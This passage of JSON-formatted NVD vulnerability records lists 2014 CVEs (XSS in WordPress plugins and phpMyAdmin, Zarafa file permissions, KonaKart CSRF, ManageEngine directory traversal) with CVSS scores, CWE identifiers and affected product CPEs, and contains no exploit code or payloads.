"baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447"], "modified": "2015-11-17T16:28:00", "cpe": ["cpe:/a:zarafa:zarafa:7.1.10", "cpe:/a:zarafa:webapp:1.6"], "id": "CVE-2014-5447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5447", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zarafa:zarafa:7.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:zarafa:webapp:1.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:32:15", "description": "Cross-site scripting (XSS) vulnerability in the Google Calendar Events plugin before 2.0.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the gce_feed_ids parameter in a gce_ajax action to wp-admin/admin-ajax.php.", "cvss3": {}, "published": "2014-10-16T19:55:00", "type": "cve", "title": "CVE-2014-7138", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7138"], "modified": "2018-10-09T19:51:00", "cpe": ["cpe:/a:google_calendar_events_project:google_calendar_events:2.0.3.1"], "id": "CVE-2014-7138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7138", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google_calendar_events_project:google_calendar_events:2.0.3.1:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T13:45:08", "description": "Zarafa Collaboration Platform 4.1 uses world-readable permissions for /etc/zarafa/license, which allows local users to obtain sensitive information by reading license files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-03-19T21:29:00", "type": "cve", "title": "CVE-2014-5450", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5450"], "modified": "2018-04-20T14:56:00", "cpe": ["cpe:/a:zarafa:zarafa_collaboration_platform:4.1"], "id": "CVE-2014-5450", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5450", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zarafa:zarafa_collaboration_platform:4.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:31:25", "description": "Cross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes.", "cvss3": {}, "published": "2014-09-26T21:55:00", "type": "cve", "title": "CVE-2014-4958", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4958"], "modified": "2015-09-16T19:30:00", "cpe": ["cpe:/a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20", "cpe:/a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35"], "id": "CVE-2014-4958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2014.1.403.35:*:*:*:*:*:*:*", "cpe:2.3:a:telerik:asp.net_ajax_radeditor_control:2009.3.1208.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:32:19", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Form DB (aka CFDB and contact-form-7-to-database-extension) plugin before 2.8.16 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) form or (2) enc parameter in the CF7DBPluginShortCodeBuilder page to wp-admin/admin.php.", "cvss3": {}, "published": "2014-10-10T14:55:00", "type": "cve", "title": "CVE-2014-7139", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7139"], "modified": "2018-10-09T19:51:00", "cpe": ["cpe:/a:cfdbplugin:contact_form_db:2.8.15"], "id": "CVE-2014-7139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7139", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:cfdbplugin:contact_form_db:2.8.15:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T14:08:43", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Web-Dorado Photo Gallery plugin 1.1.30 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) callback, (2) dir, or (3) extensions parameter in an addImages action to wp-admin/admin-ajax.php.", "cvss3": {}, "published": "2014-10-10T14:55:00", "type": "cve", "title": "CVE-2014-6315", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6315"], "modified": "2018-10-09T19:51:00", "cpe": ["cpe:/a:photo_gallery_plugin_project:photo_gallery_plugin:1.1.30"], "id": "CVE-2014-6315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6315", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:photo_gallery_plugin_project:photo_gallery_plugin:1.1.30:*:*:*:*:wordpress:*:*"]}, {"lastseen": "2022-03-23T14:08:25", "description": "Cross-site scripting (XSS) vulnerability in the micro history implementation in phpMyAdmin 4.0.x before 4.0.10.3, 4.1.x before 4.1.14.4, and 4.2.x before 4.2.8.1 allows remote attackers to inject arbitrary web script or HTML, and consequently conduct a cross-site request forgery (CSRF) attack to create a root account, via a crafted URL, related to js/ajax.js.", "cvss3": {}, "published": "2014-11-08T11:55:00", "type": "cve", "title": "CVE-2014-6300", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.0.10.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", "cpe:/o:opensuse:opensuse:12.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.3", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-6300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6300", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:12.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:45:49", "description": "Cross-site request forgery (CSRF) vulnerability in the Storefront Application in DS Data Systems KonaKart before 7.3.0.0 allows remote attackers to hijack the authentication of administrators for requests that change a user email address via an unspecified GET request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-01-03T20:15:00", "type": "cve", "title": "CVE-2014-5516", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5516"], "modified": "2020-01-15T20:36:00", "cpe": [], "id": "CVE-2014-5516", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5516", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:11", "description": "Cross-site scripting (XSS) vulnerability in MyWebSQL 3.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the table parameter to index.php.", "cvss3": {}, "published": "2014-09-12T14:55:00", "type": "cve", "title": "CVE-2014-4735", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4735"], "modified": "2018-10-09T19:49:00", "cpe": ["cpe:/a:mywebsql:mywebsql:3.1", "cpe:/a:mywebsql:mywebsql:3.2", "cpe:/a:mywebsql:mywebsql:3.0", "cpe:/a:mywebsql:mywebsql:3.4", "cpe:/a:mywebsql:mywebsql:3.3"], "id": "CVE-2014-4735", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4735", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mywebsql:mywebsql:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mywebsql:mywebsql:3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:34:30", "description": "Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.0.x before 4.0.10.4, 4.1.x before 4.1.14.5, and 4.2.x before 4.2.9.1 allow remote authenticated users to inject arbitrary web script or HTML via a crafted ENUM value that is improperly handled during rendering of the (1) table search or (2) table structure page, related to libraries/TableSearch.class.php and libraries/Util.class.php.", "cvss3": {}, "published": "2014-10-03T01:55:00", "type": "cve", "title": "CVE-2014-7217", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2016-04-04T13:15:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:4.1.11", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.8", "cpe:/a:phpmyadmin:phpmyadmin:4.2.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.12", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14", "cpe:/a:phpmyadmin:phpmyadmin:4.1.13", "cpe:/a:phpmyadmin:phpmyadmin:4.0.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.4", "cpe:/a:phpmyadmin:phpmyadmin:4.0.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.4", "cpe:/a:phpmyadmin:phpmyadmin:4.1.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.5", "cpe:/a:phpmyadmin:phpmyadmin:4.1.14.1", "cpe:/a:phpmyadmin:phpmyadmin:4.1.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.9", "cpe:/a:phpmyadmin:phpmyadmin:4.1.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.7", "cpe:/a:phpmyadmin:phpmyadmin:4.0.3", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.1", "cpe:/a:phpmyadmin:phpmyadmin:4.2.2", "cpe:/a:phpmyadmin:phpmyadmin:4.0.5", "cpe:/a:phpmyadmin:phpmyadmin:4.0.7", "cpe:/a:phpmyadmin:phpmyadmin:4.1.0", "cpe:/a:phpmyadmin:phpmyadmin:4.2.0", "cpe:/a:phpmyadmin:phpmyadmin:4.0.6", "cpe:/a:phpmyadmin:phpmyadmin:4.1.10", "cpe:/a:phpmyadmin:phpmyadmin:4.2.3", "cpe:/a:phpmyadmin:phpmyadmin:4.2.9", "cpe:/a:phpmyadmin:phpmyadmin:4.2.7", "cpe:/a:phpmyadmin:phpmyadmin:4.2.8", "cpe:/a:phpmyadmin:phpmyadmin:4.0.4.2", "cpe:/a:phpmyadmin:phpmyadmin:4.1.3"], "id": "CVE-2014-7217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7217", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:4.0.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:00:37", "description": "Directory traversal vulnerability in the com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector servlet in ZOHO ManageEngine OpManager 8.8 through 11.3, Social IT Plus 11.0, and IT360 10.4 and earlier allows remote attackers or remote authenticated users to write to and execute arbitrary WAR files via a .. (dot dot) in the regionID parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6034", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6034"], "modified": "2014-12-05T13:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:9.1", "cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:10.1", "cpe:/a:zohocorp:manageengine_opmanager:11.1", "cpe:/a:zohocorp:manageengine_opmanager:9.2", "cpe:/a:zohocorp:manageengine_opmanager:10.2", "cpe:/a:zohocorp:manageengine_it360:10.4", "cpe:/a:zohocorp:manageengine_social_it_plus:11.0", "cpe:/a:zohocorp:manageengine_opmanager:11.0", "cpe:/a:zohocorp:manageengine_opmanager:8.8", "cpe:/a:zohocorp:manageengine_opmanager:11.2", "cpe:/a:zohocorp:manageengine_opmanager:9.4", "cpe:/a:zohocorp:manageengine_opmanager:9.0", "cpe:/a:zohocorp:manageengine_opmanager:10.0"], "id": "CVE-2014-6034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6034", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.1:*:*:*:*:*:*:*", 